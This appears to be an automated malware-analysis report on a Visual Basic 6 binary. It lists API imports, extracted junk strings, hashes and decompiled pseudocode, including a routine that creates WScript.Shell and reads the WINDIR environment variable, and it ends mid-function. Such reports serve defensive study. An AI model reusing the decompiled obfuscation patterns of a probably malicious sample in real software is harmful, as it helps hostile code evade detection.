0x0042d2ef
0x0042d2f0
0x0042d2f2
0x0042d2ff
0x0042d30a
0x0042d314
0x0042d31f
0x0042d324
0x0042d32b
0x0042d335
0x0042d339
0x0042d33a
0x0042d342
0x0042d343
0x0042d34d
0x0042d354
0x0042d35f
0x0042d367
0x0042d36f
0x0042d373
0x0042d374
0x0042d376
0x0042d37e
0x0042d385
0x0042d38f
0x0042d393
0x0042d394
0x0042d39c
0x0042d39d
0x0042d3a7
0x0042d3ae
0x0042d3b9
0x0042d3c1
0x0042d3c9
0x0042d3cd
0x0042d3ce
0x0042d3d0
0x0042d3d8
0x0042d3dd
0x0042d3e7
0x0042d3ec
0x0042d3ef
0x0042d3f5
0x0042d3f9
0x0042d404
0x0042d409
0x0042d40a
0x0042d414
0x0042d41b
0x0042d426
0x0042d42e
0x0042d432
0x0042d436
0x0042d437
0x0042d439
0x0042d446
0x0042d451
0x0042d456
0x0042d45e
0x0042d45f
0x0042d467
0x0042d468
0x0042d472
0x0042d479
0x0042d484
0x0042d48c
0x0042d494
0x0042d49c
0x0042d4a2
0x0042d4b2
0x0042d4b5
0x0042d4bf
0x0042d4c0
0x0042d4c3
0x0042d4c4
0x0042d4c9
0x0042d4d6
0x0042d4eb
0x0042d4d8
0x0042d4d8
0x0042d4de
0x0042d4e3
0x0042d4e3
0x0042d4f8
0x0042d4fc
0x0042d4fd
0x0042d500
0x0042d501
0x0042d506
0x0042d507
0x0042d50c
0x0042d512
0x0042d516
0x0042d517
0x0042d519
0x0042d51e
0x0042d521
0x0042d522
0x0042d559
0x0042d55f
0x0042d565
0x0042d566
0x0042d568
0x0042d56d

APIs

__vbaChkstk.MSVBVM60(?,00401326), ref: 0042D12D
__vbaAryConstruct2.MSVBVM60(?,00410798,00000008,?,?,?,?,00401326), ref: 0042D15C
__vbaVarDup.MSVBVM60 ref: 0042D175
#543.MSVBVM60(?,?), ref: 0042D182
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 0042D1A6
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 0042D1BC
#613.MSVBVM60(?,00000003), ref: 0042D1E9
__vbaStrVarMove.MSVBVM60(?,?,00000003), ref: 0042D1F2
__vbaStr.MSVBVM60(?,?,00000003), ref: 0042D1FC
__vbaStrCopy.MSVBVM60(?,?,00000003), ref: 0042D206
__vbaFreeVarList.MSVBVM60(00000002,00000003,?,?,?,00000003), ref: 0042D21D
__vbaStrCopy.MSVBVM60(?,?,?,?,?,00401326), ref: 0042D230
#539.MSVBVM60(?,00000080,000000D3,00000030,?,?,?,?,?,00401326), ref: 0042D245
__vbaStrVarMove.MSVBVM60(?,?,00000080,000000D3,00000030,?,?,?,?,?,00401326), ref: 0042D24E
__vbaStr.MSVBVM60(?,?,00000080,000000D3,00000030,?,?,?,?,?,00401326), ref: 0042D258
__vbaStrCopy.MSVBVM60(?,?,00000080,000000D3,00000030,?,?,?,?,?,00401326), ref: 0042D269
__vbaFreeVar.MSVBVM60(?,?,00000080,000000D3,00000030,?,?,?,?,?,00401326), ref: 0042D279
__vbaStrCopy.MSVBVM60(?,?,00000080,000000D3,00000030,?,?,?,?,?,00401326), ref: 0042D28E
__vbaVarDup.MSVBVM60 ref: 0042D2A7
#619.MSVBVM60(?,?,00000049), ref: 0042D2B6
__vbaStrVarMove.MSVBVM60(?,?,?,00000049), ref: 0042D2BF
__vbaStr.MSVBVM60(?,?,?,00000049), ref: 0042D2C9
__vbaStrCopy.MSVBVM60(?,?,?,00000049), ref: 0042D2DB
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,00000049), ref: 0042D2F2
__vbaStrCopy.MSVBVM60(00000080,000000D3,00000030,?,?,?,?,?,00401326), ref: 0042D30A
__vbaStrCopy.MSVBVM60(00000080,000000D3,00000030,?,?,?,?,?,00401326), ref: 0042D31F
#647.MSVBVM60(?,0000000A), ref: 0042D33A
__vbaStrVarMove.MSVBVM60(?,?,0000000A), ref: 0042D343
__vbaStr.MSVBVM60(?,?,0000000A), ref: 0042D34D
__vbaStrCopy.MSVBVM60(?,?,0000000A), ref: 0042D35F
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,0000000A), ref: 0042D376
#647.MSVBVM60(?,0000000A), ref: 0042D394
__vbaStrVarMove.MSVBVM60(?,?,0000000A), ref: 0042D39D
__vbaStr.MSVBVM60(?,?,0000000A), ref: 0042D3A7
__vbaStrCopy.MSVBVM60(?,?,0000000A), ref: 0042D3B9
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,0000000A), ref: 0042D3D0
#537.MSVBVM60(000000E1), ref: 0042D3DD
__vbaStr.MSVBVM60(000000E1), ref: 0042D3E7
__vbaStr.MSVBVM60(00000015,000000E1), ref: 0042D404
#514.MSVBVM60(00000000,00000015,000000E1), ref: 0042D40A
__vbaStr.MSVBVM60(00000000,00000015,000000E1), ref: 0042D414
__vbaStrCopy.MSVBVM60(00000000,00000015,000000E1), ref: 0042D426
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000,00000000,00000015,000000E1), ref: 0042D439
__vbaStrCopy.MSVBVM60(?,00000000,00000015,000000E1), ref: 0042D451
#541.MSVBVM60(00000015,16:16:16,?,00000000,00000015,000000E1), ref: 0042D45F
__vbaStrVarMove.MSVBVM60(00000015,00000015,16:16:16,?,00000000,00000015,000000E1), ref: 0042D468
__vbaStr.MSVBVM60(00000015,00000015,16:16:16,?,00000000,00000015,000000E1), ref: 0042D472
__vbaStrCopy.MSVBVM60(00000015,00000015,16:16:16,?,00000000,00000015,000000E1), ref: 0042D484
__vbaFreeVar.MSVBVM60(00000015,00000015,16:16:16,?,00000000,00000015,000000E1), ref: 0042D494
#564.MSVBVM60(00000004,00000015), ref: 0042D4C4
__vbaHresultCheck.MSVBVM60(00000000,00000004,00000015), ref: 0042D4DE
__vbaVarSub.MSVBVM60(?,00000015,00000003,?,?,?,?,00000004,00000015), ref: 0042D501
__vbaI4Var.MSVBVM60(00000000,?,00000015,00000003,?,?,?,?,00000004,00000015), ref: 0042D507
__vbaFreeVarList.MSVBVM60(00000002,00000004,00000015,00000000,?,00000015,00000003,?,?,?,?,00000004,00000015), ref: 0042D519
__vbaAryDestruct.MSVBVM60(00000000,?,0042D56E,?,?,00401326), ref: 0042D568

Strings

Forforstrkninger1, xrefs: 0042D30F
16:16:16, xrefs: 0042D456
Psychobiologic, xrefs: 0042D293
BOLIGSPEKULANT, xrefs: 0042D2FA
AFVRGEMANVRES, xrefs: 0042D441
15:15:15, xrefs: 0042D161
OPLEVELSE, xrefs: 0042D225
Fornuftigst, xrefs: 0042D27E

Memory Dump Source

Source File: 00000000.00000002.463862352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.463827063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470200386.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Copy$Free$List$Move$#647$#514#537#539#541#543#564#613#619CheckChkstkConstruct2DestructHresult
String ID: 15:15:15$16:16:16$AFVRGEMANVRES$BOLIGSPEKULANT$Forforstrkninger1$Fornuftigst$OPLEVELSE$Psychobiologic
API String ID: 1543345708-1641975638
Opcode ID: dbac9ff6cf71a8a8da70c8eb7ecc431105c2fda476c878fb374b0340c4f0f8f8
Instruction ID: 73223b0fe3e98b70be7927058df3cc5dcb1acbc74c99928fd7b4c7901c2b649d
Opcode Fuzzy Hash: dbac9ff6cf71a8a8da70c8eb7ecc431105c2fda476c878fb374b0340c4f0f8f8
Instruction Fuzzy Hash: 1FC1DE71D00218AADB00EBE1DC96BEEB7B9AF44304F14453AF506BF1D1EB789A45CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0042C26E, Relevance: 73.8, APIs: 34, Strings: 8, Instructions: 275
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0042C26E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				short _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				char _v52;
				char _v68;
				char _v84;
				char* _v92;
				intOrPtr _v100;
				char* _v124;
				intOrPtr _v132;
				char _v152;
				void* _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				short _v172;
				intOrPtr* _v184;
				signed int _v188;
				signed int _v192;
				intOrPtr* _v196;
				signed int _v200;
				signed int _v204;
				char* _t122;
				signed int _t133;
				signed int _t138;
				short _t142;
				char* _t150;
				char* _t154;
				char* _t155;
				signed int _t163;
				signed int _t168;
				void* _t200;
				void* _t202;
				intOrPtr _t203;

				_t203 = _t202 - 0xc;
				 *[fs:0x0] = _t203;
				L00401320();
				_v16 = _t203;
				_v12 = E00401238;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401326, _t200);
				_v92 = L"Planlgnings";
				_v100 = 8;
				L0040149A();
				_t122 =  &_v68;
				_push(_t122);
				L00401446();
				asm("sbb eax, eax");
				_v156 =  ~( ~(_t122 - 0xffff) + 1);
				L004015A8();
				if(_v156 != 0) {
					_push(0);
					_push(L"WScript.Shell");
					_push( &_v68);
					L00401566();
					_t150 =  &_v68;
					_push(_t150);
					L0040156C();
					_push(_t150);
					_push( &_v28);
					L00401572();
					L004015A8();
					_v124 = L"WINDIR";
					_v132 = 8;
					_v92 = L"PROCESS";
					_v100 = 8;
					_push(0x10);
					L00401320();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(1);
					_push(L"Item");
					_push(0x10);
					L00401320();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(1);
					_push(L"Environment");
					_push(_v28);
					_t154 =  &_v68;
					_push(_t154);
					L00401554();
					_push(_t154);
					_t155 =  &_v84;
					_push(_t155);
					L0040155A();
					_push(_t155);
					L00401560();
					L004015B4();
					_push( &_v84);
					_push( &_v68);
					_push(2);
					L00401590();
					_t203 = _t203 + 0x4c;
					if( *0x42f414 != 0) {
						_v184 = 0x42f414;
					} else {
						_push(0x42f414);
						_push(0x410160);
						L004015A2();
						_v184 = 0x42f414;
					}
					_v156 =  *_v184;
					_t163 =  *((intOrPtr*)( *_v156 + 0x14))(_v156,  &_v52);
					asm("fclex");
					_v160 = _t163;
					if(_v160 >= 0) {
						_v188 = _v188 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x410150);
						_push(_v156);
						_push(_v160);
						L004015C6();
						_v188 = _t163;
					}
					_v164 = _v52;
					_v92 = 0x80020004;
					_v100 = 0xa;
					L00401320();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t168 =  *((intOrPtr*)( *_v164 + 0x13c))(_v164, L"Pelycosaur7", 0x10);
					asm("fclex");
					_v168 = _t168;
					if(_v168 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x13c);
						_push(0x410170);
						_push(_v164);
						_push(_v168);
						L004015C6();
						_v192 = _t168;
					}
					L004015C0();
				}
				if( *0x42f414 != 0) {
					_v196 = 0x42f414;
				} else {
					_push(0x42f414);
					_push(0x410160);
					L004015A2();
					_v196 = 0x42f414;
				}
				_v156 =  *_v196;
				_t133 =  *((intOrPtr*)( *_v156 + 0x4c))(_v156,  &_v52);
				asm("fclex");
				_v160 = _t133;
				if(_v160 >= 0) {
					_v200 = _v200 & 0x00000000;
				} else {
					_push(0x4c);
					_push(0x410150);
					_push(_v156);
					_push(_v160);
					L004015C6();
					_v200 = _t133;
				}
				_v164 = _v52;
				_t138 =  *((intOrPtr*)( *_v164 + 0x20))(_v164,  &_v152);
				asm("fclex");
				_v168 = _t138;
				if(_v168 >= 0) {
					_v204 = _v204 & 0x00000000;
				} else {
					_push(0x20);
					_push(0x410180);
					_push(_v164);
					_push(_v168);
					L004015C6();
					_v204 = _t138;
				}
				_v172 =  ~(0 | _v152 - 0x000000a9 < 0x00000000);
				L004015C0();
				_t142 = _v172;
				if(_t142 != 0) {
					_v92 = L"Longimanous9";
					_v100 = 8;
					L0040149A();
					_push(0x99);
					_push( &_v68);
					_push( &_v84);
					L00401440();
					_push( &_v84);
					L00401560();
					L004015B4();
					_push( &_v84);
					_push( &_v68);
					_push(2);
					L00401590();
					_push( &_v68);
					L0040143A();
					_t142 =  &_v68;
					_push(_t142);
					L00401560();
					L004015B4();
					L004015A8();
				}
				L00401434();
				L004015B4();
				_push(_t142);
				L004014D6();
				_v32 = _t142;
				L00401578();
				_push(0x42c6ab);
				L004015C0();
				L00401578();
				L00401578();
				L00401578();
				return _t142;
			}

0x0042c271
0x0042c280
0x0042c28c
0x0042c294
0x0042c297
0x0042c29e
0x0042c2ad
0x0042c2b0
0x0042c2b7
0x0042c2c4
0x0042c2c9
0x0042c2cc
0x0042c2cd
0x0042c2d9
0x0042c2de
0x0042c2e8
0x0042c2f6
0x0042c2fc
0x0042c2fe
0x0042c306
0x0042c307
0x0042c30c
0x0042c30f
0x0042c310
0x0042c315
0x0042c319
0x0042c31a
0x0042c322
0x0042c327
0x0042c32e
0x0042c335
0x0042c33c
0x0042c343
0x0042c346
0x0042c350
0x0042c351
0x0042c352
0x0042c353
0x0042c354
0x0042c356
0x0042c35b
0x0042c35e
0x0042c368
0x0042c369
0x0042c36a
0x0042c36b
0x0042c36c
0x0042c36e
0x0042c373
0x0042c376
0x0042c379
0x0042c37a
0x0042c382
0x0042c383
0x0042c386
0x0042c387
0x0042c38f
0x0042c390
0x0042c39a
0x0042c3a2
0x0042c3a6
0x0042c3a7
0x0042c3a9
0x0042c3ae
0x0042c3b8
0x0042c3d5
0x0042c3ba
0x0042c3ba
0x0042c3bf
0x0042c3c4
0x0042c3c9
0x0042c3c9
0x0042c3e7
0x0042c3ff
0x0042c402
0x0042c404
0x0042c411
0x0042c433
0x0042c413
0x0042c413
0x0042c415
0x0042c41a
0x0042c420
0x0042c426
0x0042c42b
0x0042c42b
0x0042c43d
0x0042c443
0x0042c44a
0x0042c454
0x0042c45e
0x0042c45f
0x0042c460
0x0042c461
0x0042c475
0x0042c47b
0x0042c47d
0x0042c48a
0x0042c4af
0x0042c48c
0x0042c48c
0x0042c491
0x0042c496
0x0042c49c
0x0042c4a2
0x0042c4a7
0x0042c4a7
0x0042c4b9
0x0042c4b9
0x0042c4c5
0x0042c4e2
0x0042c4c7
0x0042c4c7
0x0042c4cc
0x0042c4d1
0x0042c4d6
0x0042c4d6
0x0042c4f4
0x0042c50c
0x0042c50f
0x0042c511
0x0042c51e
0x0042c540
0x0042c520
0x0042c520
0x0042c522
0x0042c527
0x0042c52d
0x0042c533
0x0042c538
0x0042c538
0x0042c54a
0x0042c565
0x0042c568
0x0042c56a
0x0042c577
0x0042c599
0x0042c579
0x0042c579
0x0042c57b
0x0042c580
0x0042c586
0x0042c58c
0x0042c591
0x0042c591
0x0042c5b1
0x0042c5bb
0x0042c5c0
0x0042c5c9
0x0042c5cb
0x0042c5d2
0x0042c5df
0x0042c5e4
0x0042c5ec
0x0042c5f0
0x0042c5f1
0x0042c5f9
0x0042c5fa
0x0042c604
0x0042c60c
0x0042c610
0x0042c611
0x0042c613
0x0042c61e
0x0042c61f
0x0042c624
0x0042c627
0x0042c628
0x0042c632
0x0042c63a
0x0042c63a
0x0042c63f
0x0042c649
0x0042c64e
0x0042c64f
0x0042c654
0x0042c65b
0x0042c660
0x0042c68d
0x0042c695
0x0042c69d
0x0042c6a5
0x0042c6aa

APIs

__vbaChkstk.MSVBVM60(?,00401326), ref: 0042C28C
__vbaVarDup.MSVBVM60 ref: 0042C2C4
#561.MSVBVM60(?), ref: 0042C2CD
__vbaFreeVar.MSVBVM60(?), ref: 0042C2E8
#716.MSVBVM60(?,WScript.Shell,00000000,?), ref: 0042C307
__vbaObjVar.MSVBVM60(?,?,WScript.Shell,00000000,?), ref: 0042C310
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,WScript.Shell,00000000,?), ref: 0042C31A
__vbaFreeVar.MSVBVM60(?,00000000,?,?,WScript.Shell,00000000,?), ref: 0042C322
__vbaChkstk.MSVBVM60(?,00000000,?,?,WScript.Shell,00000000,?), ref: 0042C346
__vbaChkstk.MSVBVM60(Item,00000001,?,00000000,?,?,WScript.Shell,00000000,?), ref: 0042C35E
__vbaLateMemCallLd.MSVBVM60(?,?,Environment,00000001,Item,00000001,?,00000000,?,?,WScript.Shell,00000000,?), ref: 0042C37A
__vbaVarLateMemCallLd.MSVBVM60(?,00000000,?,?,?,?,?,?,?,00401326), ref: 0042C387
__vbaStrVarMove.MSVBVM60(00000000), ref: 0042C390
__vbaStr.MSVBVM60(00000000), ref: 0042C39A
__vbaFreeVarList.MSVBVM60(00000002,?,00000000,00000000), ref: 0042C3A9
__vbaNew2.MSVBVM60(00410160,0042F414,?,?,00000000), ref: 0042C3C4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410150,00000014), ref: 0042C426
__vbaChkstk.MSVBVM60(00000000,?,00410150,00000014), ref: 0042C454
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410170,0000013C), ref: 0042C4A2
__vbaNew2.MSVBVM60(00410160,0042F414,?), ref: 0042C4D1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410150,0000004C), ref: 0042C533
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410180,00000020), ref: 0042C58C
__vbaVarDup.MSVBVM60(00000000,?,00410180,00000020), ref: 0042C5DF
#515.MSVBVM60(?,?,00000099), ref: 0042C5F1
__vbaStrVarMove.MSVBVM60(?,?,?,00000099), ref: 0042C5FA
__vbaStr.MSVBVM60(?,?,?,00000099), ref: 0042C604
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,00000099), ref: 0042C613
#612.MSVBVM60(?,?,?,00401326), ref: 0042C61F
__vbaStrVarMove.MSVBVM60(?,?,?,?,00401326), ref: 0042C628
__vbaStr.MSVBVM60(?,?,?,?,00401326), ref: 0042C632
__vbaFreeVar.MSVBVM60(?,?,?,?,00401326), ref: 0042C63A
#611.MSVBVM60(?,?,?,?,00401326), ref: 0042C63F
__vbaStr.MSVBVM60(?,?,?,?,00401326), ref: 0042C649
#696.MSVBVM60(00000000), ref: 0042C64F

Strings

Environment, xrefs: 0042C36E
Planlgnings, xrefs: 0042C2B0
Pelycosaur7, xrefs: 0042C462
PROCESS, xrefs: 0042C335
Item, xrefs: 0042C356
WINDIR, xrefs: 0042C327
Longimanous9, xrefs: 0042C5CB
WScript.Shell, xrefs: 0042C2FE

Memory Dump Source

Source File: 00000000.00000002.463862352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.463827063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470200386.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckChkstkHresult$Move$CallLateListNew2$#515#561#611#612#696#716Addref
String ID: Environment$Item$Longimanous9$PROCESS$Pelycosaur7$Planlgnings$WINDIR$WScript.Shell
API String ID: 561487127-563862138
Opcode ID: b9a995b4fef07accf6ac866fd462e8753ba0e38552d31dc1a6f4e31d837db8ee
Instruction ID: f43053bf157952dbec8c7df3a0dac045115a7616e4adf603229a9a1413671ff6
Opcode Fuzzy Hash: b9a995b4fef07accf6ac866fd462e8753ba0e38552d31dc1a6f4e31d837db8ee
Instruction Fuzzy Hash: 06B14D71D10228EEDB10EBA1CC45BDEB7B5BF05304F5040AAF509BB1A1DBB85A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0042BDDC, Relevance: 49.2, APIs: 24, Strings: 4, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0042BDDC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				short _v44;
				void* _v48;
				void* _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v68;
				char _v76;
				char _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				void* _v112;
				signed int _v116;
				intOrPtr* _v120;
				signed int _v124;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				signed int _v148;
				char* _t83;
				signed int _t88;
				short _t92;
				signed int _t98;
				signed int _t103;
				void* _t139;
				void* _t141;
				intOrPtr _t142;

				_t142 = _t141 - 0xc;
				 *[fs:0x0] = _t142;
				L00401320();
				_v16 = _t142;
				_v12 = 0x401218;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x7c,  *[fs:0x0], 0x401326, _t139);
				L0040158A();
				L0040158A();
				_v68 = 0x2c87d;
				_v76 = 3;
				_t83 =  &_v76;
				_push(_t83);
				L0040146A();
				asm("sbb eax, eax");
				_v112 =  ~( ~(_t83 - 0x21) + 1);
				L004015A8();
				_t88 = _v112;
				if(_t88 != 0) {
					L004014F4();
					L004015B4();
					_push(L"16:16:16");
					_push( &_v76);
					L0040153C();
					_t88 =  &_v76;
					_push(_t88);
					L00401560();
					L004015B4();
					L004015A8();
				}
				_push(0xa1);
				_push(L"PHARYNGOLARYNGITIS");
				L00401464();
				L004015B4();
				_push(_t88);
				_push(L"Dennys9");
				L00401584();
				asm("sbb eax, eax");
				_v112 =  ~( ~( ~_t88));
				L00401578();
				_t92 = _v112;
				if(_t92 != 0) {
					if( *0x42f414 != 0) {
						_v140 = 0x42f414;
					} else {
						_push(0x42f414);
						_push(0x410160);
						L004015A2();
						_v140 = 0x42f414;
					}
					_v112 =  *_v140;
					_t98 =  *((intOrPtr*)( *_v112 + 0x14))(_v112,  &_v60);
					asm("fclex");
					_v116 = _t98;
					if(_v116 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x410150);
						_push(_v112);
						_push(_v116);
						L004015C6();
						_v144 = _t98;
					}
					_v120 = _v60;
					_t103 =  *((intOrPtr*)( *_v120 + 0xf8))(_v120,  &_v56);
					asm("fclex");
					_v124 = _t103;
					if(_v124 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x410170);
						_push(_v120);
						_push(_v124);
						L004015C6();
						_v148 = _t103;
					}
					_v136 = _v56;
					_v56 = _v56 & 0x00000000;
					L004015B4();
					L004015C0();
					_v100 = 0x410590;
					_v108 = 8;
					L0040149A();
					_push( &_v76);
					_push(0xb);
					_push( &_v92);
					L0040145E();
					_push( &_v92);
					L00401560();
					L004015B4();
					_push( &_v92);
					_t92 =  &_v76;
					_push(_t92);
					_push(2);
					L00401590();
				}
				_push(L"Steatornis");
				L004014D6();
				_v44 = _t92;
				_push(0x42c077);
				L00401578();
				L00401578();
				L00401578();
				L00401578();
				L00401578();
				L00401578();
				return _t92;
			}

0x0042bddf
0x0042bdee
0x0042bdf8
0x0042be00
0x0042be03
0x0042be0a
0x0042be19
0x0042be22
0x0042be2d
0x0042be32
0x0042be39
0x0042be40
0x0042be43
0x0042be44
0x0042be4e
0x0042be53
0x0042be5a
0x0042be5f
0x0042be65
0x0042be67
0x0042be71
0x0042be76
0x0042be7e
0x0042be7f
0x0042be84
0x0042be87
0x0042be88
0x0042be92
0x0042be9a
0x0042be9a
0x0042be9f
0x0042bea4
0x0042bea9
0x0042beb3
0x0042beb8
0x0042beb9
0x0042bebe
0x0042bec5
0x0042becb
0x0042bed2
0x0042bed7
0x0042bedd
0x0042beea
0x0042bf07
0x0042beec
0x0042beec
0x0042bef1
0x0042bef6
0x0042befb
0x0042befb
0x0042bf19
0x0042bf28
0x0042bf2b
0x0042bf2d
0x0042bf34
0x0042bf50
0x0042bf36
0x0042bf36
0x0042bf38
0x0042bf3d
0x0042bf40
0x0042bf43
0x0042bf48
0x0042bf48
0x0042bf5a
0x0042bf69
0x0042bf6f
0x0042bf71
0x0042bf78
0x0042bf97
0x0042bf7a
0x0042bf7a
0x0042bf7f
0x0042bf84
0x0042bf87
0x0042bf8a
0x0042bf8f
0x0042bf8f
0x0042bfa1
0x0042bfa7
0x0042bfb4
0x0042bfbc
0x0042bfc1
0x0042bfc8
0x0042bfd5
0x0042bfdd
0x0042bfde
0x0042bfe3
0x0042bfe4
0x0042bfec
0x0042bfed
0x0042bff7
0x0042bfff
0x0042c000
0x0042c003
0x0042c004
0x0042c006
0x0042c00b
0x0042c00e
0x0042c013
0x0042c018
0x0042c01c
0x0042c049
0x0042c051
0x0042c059
0x0042c061
0x0042c069
0x0042c071
0x0042c076

APIs

__vbaChkstk.MSVBVM60(?,00401326), ref: 0042BDF8
__vbaStrCopy.MSVBVM60(?,?,?,?,00401326), ref: 0042BE22
__vbaStrCopy.MSVBVM60(?,?,?,?,00401326), ref: 0042BE2D
#563.MSVBVM60(00000003), ref: 0042BE44
__vbaFreeVar.MSVBVM60(00000003), ref: 0042BE5A
#669.MSVBVM60(00000003), ref: 0042BE67
__vbaStr.MSVBVM60(00000003), ref: 0042BE71
#541.MSVBVM60(00000003,16:16:16,00000003), ref: 0042BE7F
__vbaStrVarMove.MSVBVM60(00000003,00000003,16:16:16,00000003), ref: 0042BE88
__vbaStr.MSVBVM60(00000003,00000003,16:16:16,00000003), ref: 0042BE92
__vbaFreeVar.MSVBVM60(00000003,00000003,16:16:16,00000003), ref: 0042BE9A
#512.MSVBVM60(PHARYNGOLARYNGITIS,000000A1,00000003), ref: 0042BEA9
__vbaStr.MSVBVM60(PHARYNGOLARYNGITIS,000000A1,00000003), ref: 0042BEB3
__vbaStrCmp.MSVBVM60(Dennys9,00000000,PHARYNGOLARYNGITIS,000000A1,00000003), ref: 0042BEBE
__vbaNew2.MSVBVM60(00410160,0042F414,Dennys9,00000000,PHARYNGOLARYNGITIS,000000A1,00000003), ref: 0042BEF6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410150,00000014,?,?,?,?,?,?,?,?,?,?,?,Dennys9), ref: 0042BF43
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410170,000000F8,?,?,?,?,?,?,?,?,?,?,?,Dennys9), ref: 0042BF8A
__vbaStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,Dennys9,00000000,PHARYNGOLARYNGITIS), ref: 0042BFB4
__vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,Dennys9,00000000,PHARYNGOLARYNGITIS), ref: 0042BFD5
#607.MSVBVM60(?,0000000B,00000003), ref: 0042BFE4
__vbaStrVarMove.MSVBVM60(?,?,0000000B,00000003), ref: 0042BFED
__vbaStr.MSVBVM60(?,?,0000000B,00000003), ref: 0042BFF7
__vbaFreeVarList.MSVBVM60(00000002,00000003,?,?,?,0000000B,00000003), ref: 0042C006
#696.MSVBVM60(Steatornis,Dennys9,00000000,PHARYNGOLARYNGITIS,000000A1,00000003), ref: 0042C013

Strings

16:16:16, xrefs: 0042BE76
Dennys9, xrefs: 0042BEB9
Steatornis, xrefs: 0042C00E
PHARYNGOLARYNGITIS, xrefs: 0042BEA4

Memory Dump Source

Source File: 00000000.00000002.463862352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.463827063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470200386.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckCopyHresultMove$#512#541#563#607#669#696ChkstkListNew2
String ID: 16:16:16$Dennys9$PHARYNGOLARYNGITIS$Steatornis
API String ID: 2553851670-2721764529
Opcode ID: 057c796ae37d9397709c2638f79562cd9a6986f3e129c1ecb128d382b4d8fbfb
Instruction ID: e8fc4be26e9aef169114aaf70c51cc06e267efdb252e45461074c91f2e5a18dd
Opcode Fuzzy Hash: 057c796ae37d9397709c2638f79562cd9a6986f3e129c1ecb128d382b4d8fbfb
Instruction Fuzzy Hash: 1271FC71D40218ABCB10EFA1DD46BDDBBB4AF44704F50457AF006BB1A1EB789989CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0042CA6C, Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 238
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0042CA6C(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v32;
				short _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				signed int _v52;
				char _v56;
				intOrPtr _v64;
				char _v72;
				char _v88;
				char _v104;
				char* _v128;
				char _v136;
				char* _v144;
				intOrPtr _v152;
				void* _v156;
				char _v160;
				void* _v164;
				signed int _v168;
				void* _v172;
				signed int _v176;
				intOrPtr _v188;
				intOrPtr* _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				intOrPtr* _v208;
				signed int _v212;
				signed int _v216;
				short _t135;
				signed int _t139;
				char* _t140;
				signed int _t144;
				short _t148;
				signed int _t155;
				signed int _t160;
				signed int _t166;
				signed int _t171;
				void* _t196;
				void* _t198;
				intOrPtr _t199;

				_t199 = _t198 - 0xc;
				 *[fs:0x0] = _t199;
				L00401320();
				_v16 = _t199;
				_v12 = 0x4012d0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401326, _t196);
				L0040158A();
				L0040158A();
				_v128 =  &_v32;
				_v136 = 0x4008;
				_push(0x47);
				_push( &_v136);
				_push( &_v72);
				L00401440();
